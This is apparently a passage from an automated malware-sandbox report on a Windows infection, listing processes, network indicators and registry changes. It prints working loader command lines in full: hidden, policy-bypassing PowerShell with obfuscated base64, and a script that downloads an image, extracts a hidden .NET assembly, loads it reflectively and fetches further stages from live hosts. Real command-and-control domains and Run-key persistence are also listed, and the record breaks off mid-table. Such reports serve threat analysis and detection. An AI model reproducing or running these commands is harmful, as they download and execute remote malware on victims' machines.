gTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreYwBjDgTreGMDgTreZQByDgTreC8DgTrecwBjDgTreC8DgTreegBuDgTreC4DgTreZQBuDgTreGkDgTreZDgTreBsDgTreGEDgTrecgBlDgTreGcDgTreeQBhDgTreHQDgTrecwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBvDgTreHYDgTreYQDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreTDgTreBJDgTreFIDgTreUDgTreBBDgTreFYDgTreSDgTreDgTrevDgTreHMDgTreYwDgTrevDgTreHoDgTrebgDgTreuDgTreGUDgTrebgBpDgTreGQDgTrebDgTreBhDgTreHIDgTreZQBnDgTreHkDgTreYQB0DgTreHMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTrebwB2DgTreGEDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cccer/sc/zn.enidlaregyats//:sptth' , '1' , 'C:\ProgramData\' , 'ova','RegAsm',''))}
}"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.LIRPAVH/sc/zn.enidlaregyats//:sptth' , '1' , 'C:\ProgramData\' , 'ova','RegAsm',''))}
}"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\ova.vbs"
|
||
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\ova.vbs"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 14 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://staygeraldine.nz/cs/xwapri.txt
|
185.184.154.65
|
||
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
https://staygeraldine.nz/cs/HVAPRIL.txt
|
185.184.154.65
|
||
https://uploaddeimagens.com.br
|
unknown
|
||
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
|
172.67.215.45
|
||
https://staygeraldine.nz/cs/reccc.txt
|
185.184.154.65
|
||
http://app01.system.com.br/RDWeb/Pages/login.aspx
|
unknown
|
||
https://pastebin.com/raw/KiVfSXMq
|
172.67.19.24
|
||
https://pastebin.com/raw/zQdp8jhj
|
172.67.19.24
|
||
http://crl.microsoft
|
unknown
|
||
http://staygeraldine.nz
|
unknown
|
||
https://go.microsoft.coB
|
unknown
|
||
https://pastebin.com/v
|
unknown
|
||
https://aka.ms/pscore6
|
unknown
|
||
http://app01.system.com.br/RDWeb/Pages/login.aspx1
|
unknown
|
||
http://crl.microsoftx
|
unknown
|
||
https://pastebin.com/raw/eEY9exCe
|
172.67.19.24
|
||
https://pastebin.com/raw/KiVfSXMq(
|
unknown
|
||
https://aka.ms/pscore6lBsq
|
unknown
|
||
http://app01.system.com.br/RDWeb/Pages/login.aspxd
|
unknown
|
||
http://app01.system.com.br/RDWeb/Pages/login.aspx&
|
unknown
|
||
https://pastebin.com/raw/KiVy
|
unknown
|
||
https://pastebin.com/raw/eEY9exCeu
|
unknown
|
||
http://app01.system.com.br/RDWeb/Pages/login.aspx_Gen
|
unknown
|
||
https://pastebin.com/_J-
|
unknown
|
||
https://pastebin.com/raw/KiVfSXMqB
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://pastebin.com/
|
unknown
|
||
https://pastebin.com/raw/eEY
|
unknown
|
||
http://crl.microu
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://pastebin.com/raw/KiV
|
unknown
|
||
https://pastebin.com/raw/eEY9exCerY
|
unknown
|
||
http://crl.v
|
unknown
|
||
https://staygeraldine.nz
|
unknown
|
||
https://pastebin.com/raw/zQdp8jhjJ
|
unknown
|
||
https://pastebin.com/raw/eEYi
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
staygeraldine.nz
|
185.184.154.65
|
||
hvaprinew850.duckdns.org
|
12.221.146.138
|
||
aprilxrwonew8450.duckdns.org
|
12.221.146.138
|
||
uploaddeimagens.com.br
|
172.67.215.45
|
||
remco8100.duckdns.org
|
12.221.146.138
|
||
geoplugin.net
|
178.237.33.50
|
||
pastebin.com
|
172.67.19.24
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
185.184.154.65
|
staygeraldine.nz
|
United Kingdom
|
||
12.221.146.138
|
hvaprinew850.duckdns.org
|
United States
|
||
172.67.215.45
|
uploaddeimagens.com.br
|
United States
|
||
172.67.19.24
|
pastebin.com
|
United States
|
||
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
